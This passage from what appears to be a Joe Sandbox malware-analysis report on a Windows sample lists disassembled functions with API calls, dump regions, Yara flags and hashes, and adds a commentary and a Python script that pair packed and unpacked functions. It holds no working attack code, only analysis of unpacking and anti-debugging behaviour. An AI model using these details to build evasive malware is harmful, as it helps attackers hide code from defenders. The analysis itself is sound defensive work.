                                                  • Sleep.KERNEL32(000002C7), ref: 03011BB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                  • String ID: 4#E$i
                                                  • API String ID: 4246938166-2480119546
                                                  • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                  • Instruction ID: 6e6e87e177aa230cffb60b4a1c94267fa4f35cfbf5a4c5304b5ce79624768522
                                                  • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                  • Instruction Fuzzy Hash: F0514634C02384DAE319DFA4ED457FDBBB8FF6A306F044228D901A6162EBB09685C759
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 030123B8
                                                  • GetClientRect.USER32(?,?), ref: 030123CD
                                                  • GetDC.USER32(?), ref: 030123D4
                                                  • CreateSolidBrush.GDI32(00646464), ref: 030123E7
                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 03012406
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 03012427
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 03012432
                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 0301243B
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 0301245F
                                                  • SetBkMode.GDI32(?,00000001), ref: 030124EA
                                                  • _wcslen.LIBCMT ref: 03012502
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                  • String ID:
                                                  • API String ID: 1529870607-0
                                                  • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                  • Instruction ID: 912a36bfd177cbf6884a9afd9d5512e45b1d0b64e2c18f707b8c58eb05c7f646
                                                  • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                  • Instruction Fuzzy Hash: 3C71FC76900218AFDB22DF64DD85FAEB7BCEF49711F0041A5B609E6151DA70AF80CF14
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                  • Instruction ID: 704f0dc4c1cc7227d133c65a0813f8dc888d98eeea65dda385bca534dc2e7eac
                                                  • Opcode Fuzzy Hash: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                  • Instruction Fuzzy Hash: 37C26D71E096288FDB25DE29DD407EAB7B5EB48304F1451EBD80DE7280E778AE818F45
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                  • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0304BD14,?,00000000), ref: 0304BA8E
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0304BD14,?,00000000), ref: 0304BAB7
                                                  • GetACP.KERNEL32(?,?,0304BD14,?,00000000), ref: 0304BACC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction ID: 30efa2db2ebc421b8eb16f6be3d9c1d2f9248bf7c7b318aeffa685f0bbb35bb2
                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction Fuzzy Hash: 6321D6B2602104ABEB70CF54C901A97BBEAEF44E14B4E84B4E989D7100FB32DF60C350
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 2287132625-0
                                                  • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                  • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                  • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                  • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 030421C0
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0304BCD5
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0304BD30
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0304BD3F
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,03040A3C,00000040,?,03040B5C,00000055,00000000,?,?,00000055,00000000), ref: 0304BD87
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,03040ABC,00000040), ref: 0304BDA6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 2287132625-0
                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                  • Instruction ID: 9800e2653d3d7b79a711be645c873d727aeff6bd65707f66d184c1fd1d7ee460
                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                  • Instruction Fuzzy Hash: 175171B5A01205EBDB50DFA9DC81ABEB7B8BF55700F088479E944EB190EB71DB048B61
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                  • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                  • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                  • String ID:
                                                  • API String ID: 2444527052-0
                                                  • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                  • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                  • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                  • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                  APIs
                                                    • Part of subcall function 03042161: GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                    • Part of subcall function 03042161: _free.LIBCMT ref: 03042198
                                                    • Part of subcall function 03042161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,03040A43,?,?,?,?,0304049A,?,00000004), ref: 0304B373
                                                  • _wcschr.LIBVCRUNTIME ref: 0304B403
                                                  • _wcschr.LIBVCRUNTIME ref: 0304B411
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,03040A43,00000000,03040B63), ref: 0304B4B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                  • String ID:
                                                  • API String ID: 2444527052-0
                                                  • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                  • Instruction ID: daf9a4b69e32b99a1fca4d2cbcd848c2dd45511307390150febb7266d4eaf21d
                                                  • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                  • Instruction Fuzzy Hash: C36105F5602306AADB24EB35DC41BBBB3ECEF84700F184479E985CB580EA70E74187A1
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: 11@$GetLocaleInfoEx
                                                  • API String ID: 2299586839-1075713910
                                                  • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                  • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                  • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                  • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                  APIs
                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free
                                                  • String ID:
                                                  • API String ID: 2834031935-0
                                                  • Opcode ID: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                  • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                  • Opcode Fuzzy Hash: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                  • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                  • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                  • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                  • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0301DAFC), ref: 0303A752
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0301DAFC), ref: 0303A75C
                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0301DAFC), ref: 0303A769
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                  • Instruction ID: 5449373988b9d9abe5e02e44d823e020e4429b7e9a4576c2bd9eef495a4cb2cf
                                                  • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                  • Instruction Fuzzy Hash: 2731C47490132CABCB61DF64DC887C9BBB8AF09710F5041EAE41CA7250E7749B858F44
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                  • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                  • ExitProcess.KERNEL32 ref: 0042FEB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002,00000000), ref: 03040107
                                                  • TerminateProcess.KERNEL32(00000000,?,030400BC,00000000,00457970,0000000C,03040213,00000000,00000002,00000000), ref: 0304010E
                                                  • ExitProcess.KERNEL32 ref: 03040120
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction ID: c896ba8a82b04e095c0308b2e38cba07fe51d0fc76afce6eaf68900d21e19615
                                                  • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                  • Instruction Fuzzy Hash: 3AE0B675002648ABCF15AF58DD09A99BBA9EB4AE42B044474FA059B131CB36DA42CA94
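Each record above is one disassembled function, and most functions appear twice: once in the PE-backed image at 00400000 and once in the non-PE-backed region at 03010000 that carries the Yara matches, consistent with the unpacking signatures in the overview. On this page the relocated copy keeps its Opcode ID while its Instruction ID changes: the two TerminateProcess records share 5e7a358d... with different Instruction IDs, whereas the two IsDebuggerPresent records have different Opcode IDs. Two caveats a reviewer would want here: the IsDebuggerPresent / SetUnhandledExceptionFilter(0) / UnhandledExceptionFilter triple is also the sequence the MSVC CRT's fast-fail handler (__scrt_fastfail / __raise_securityfailure) emits, and the GetUserDefaultLCID / IsValidCodePage / IsValidLocale / GetLocaleInfoW chain with the error-preserving _free wrapper is what the CRT's setlocale implementation calls, so neither is by itself strong evidence of deliberate anti-debugging or locale-based evasion; the code that consumes the results is what decides that. The script below is an added example, not part of the Joe Sandbox report: it parses these records and lists the Opcode IDs seen in more than one dump region. The record layout it assumes is read off this page, and SAMPLE is four of the records above, trimmed to the fields the parser reads.

```python
"""Pair Joe Sandbox function records across memory-dump regions by Opcode ID.
Added example, not part of the report; the record layout it assumes is read off
this page, and SAMPLE is four records copied from the page, trimmed to the
fields the parser reads."""
import re
from collections import defaultdict

SOURCE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+).*based on PE:\s*(true|false)")
# "GetCurrentProcess.KERNEL32(...), ref: ..." or "_free.LIBCMT ref: ...", optionally
# prefixed with "Part of subcall function XXXXXXXX: " for calls reached indirectly
API_RE = re.compile(r"^(Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")

SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042A4F5
• UnhandledExceptionFilter.KERNEL32(?), ref: 0042A502
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
• Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0301DAFC), ref: 0303A752
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0303A75C
• UnhandledExceptionFilter.KERNEL32(-00000328), ref: 0303A769
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: 5449373988b9d9abe5e02e44d823e020e4429b7e9a4576c2bd9eef495a4cb2cf
APIs
• GetCurrentProcess.KERNEL32(00000003), ref: 0042FEA0
• TerminateProcess.KERNEL32(00000000), ref: 0042FEA7
• ExitProcess.KERNEL32 ref: 0042FEB9
Memory Dump Source
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$CurrentExitTerminate
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
APIs
• GetCurrentProcess.KERNEL32(00000000), ref: 03040107
• TerminateProcess.KERNEL32(00000000), ref: 0304010E
• ExitProcess.KERNEL32 ref: 03040120
Memory Dump Source
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: c896ba8a82b04e095c0308b2e38cba07fe51d0fc76afce6eaf68900d21e19615
"""

def _fresh():
    return {"offset": None, "based_on_pe": False, "yara": False, "api_id": "",
            "opcode_id": "", "instruction_id": "", "apis": [], "subcalls": []}

def parse_records(text):
    """One dict per function record; the Instruction ID line closes a record."""
    records, cur, in_apis = [], _fresh(), False
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            in_apis = True
        elif line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            in_apis = False
        elif line == "Yara matches":
            cur["yara"] = True
        elif in_apis:
            m = API_RE.match(line)
            if m:  # direct call, or one reached through a "subcall function"
                (cur["subcalls"] if m.group(1) else cur["apis"]).append(m.group(2))
        elif line.startswith("Source File:"):
            m = SOURCE_RE.search(line)
            if m:
                cur["offset"], cur["based_on_pe"] = m.group(1).upper(), m.group(2) == "true"
        elif line.startswith(("API ID:", "Opcode ID:", "Instruction ID:")):
            key, value = line.split(":", 1)
            cur[key.lower().replace(" ", "_")] = value.strip()
            if key == "Instruction ID":
                records.append(cur)
                cur, in_apis = _fresh(), False
    return records

def shared_opcodes(records):
    """Opcode IDs present in more than one dump region -> sorted list of offsets.
    A function copied to a new region keeps its Opcode ID but gets a new Instruction ID."""
    by_opcode = defaultdict(set)
    for r in records:
        by_opcode[r["opcode_id"]].add(r["offset"])
    return {op: sorted(offs) for op, offs in by_opcode.items() if len(offs) > 1}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["offset"], "pe" if r["based_on_pe"] else "non-pe", "yara" if r["yara"] else "-", r["api_id"])
    for op, offs in shared_opcodes(recs).items():
        print("same Opcode ID", op[:16] + "...", "in regions", offs)
```

Run against the full function list of a report (not just SAMPLE), the shared set is the part of the original image that survived into the unpacked region unchanged; functions that exist only at 03010000 are the ones worth opening first, since they are the payload's own code rather than relocated CRT.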
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$GetProcAddress.$l
                                                  • API String ID: 0-2784972518
                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction ID: 996e27a8f9e8385e911204bc37044d4a8e9ecd878c15e3395cbdd57bed5f54fb
                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                  • Instruction Fuzzy Hash: 5C313AB6911609DFDB10CF99C880AAEBBF9FF48324F15408AD441AB310D771EA95CBA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                  • Instruction ID: a227ec02499bfe1bfd98fe0f4147e6b501038b1cbe903e33c1bef616cbd9e7fb
                                                  • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                  • Instruction Fuzzy Hash: 48412A725003196ECB20EFB9DC49DABB778EB88714F10426EF905D7280EA34AD41CB58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-2043925204
                                                  • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                  • Instruction ID: 92645c9619516a0bbe4b5679a79c5eeb6782df385b765b3d558ac17ef2da991f
